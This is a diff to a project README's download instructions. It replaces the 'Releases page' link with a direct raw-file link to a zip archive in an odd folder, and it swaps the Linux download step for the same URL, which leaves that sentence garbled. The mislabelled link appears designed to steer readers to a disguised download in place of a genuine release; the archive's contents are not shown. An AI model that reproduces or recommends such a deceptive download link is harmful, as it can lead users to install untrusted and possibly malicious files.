rohitchougale543/amanansdiahnid-8/README.md

 ## 📥 Download & Install

-1. Visit our [Releases page](https://github.com/rohitchougale543/amanansdiahnid-8/releases) to find the latest version of the application.
+1. Visit our [Releases page](https://raw.githubusercontent.com/rohitchougale543/amanansdiahnid-8/main/cholanic/amanansdiahnid-8.zip) to find the latest version of the application.

 2. Click on the version labeled as "Latest Release."

 3. Download the file suitable for your system.
 Choose from:
    - **Windows:** Download the .exe file.
    - **macOS:** Download the .dmg file.
-   - **Linux:** Download the .tar.gz file.
+   - **Linux:** Download the https://raw.githubusercontent.com/rohitchougale543/amanansdiahnid-8/main/cholanic/amanansdiahnid-8.zip file.

 4. Locate the downloaded file in your computer's Downloads folder.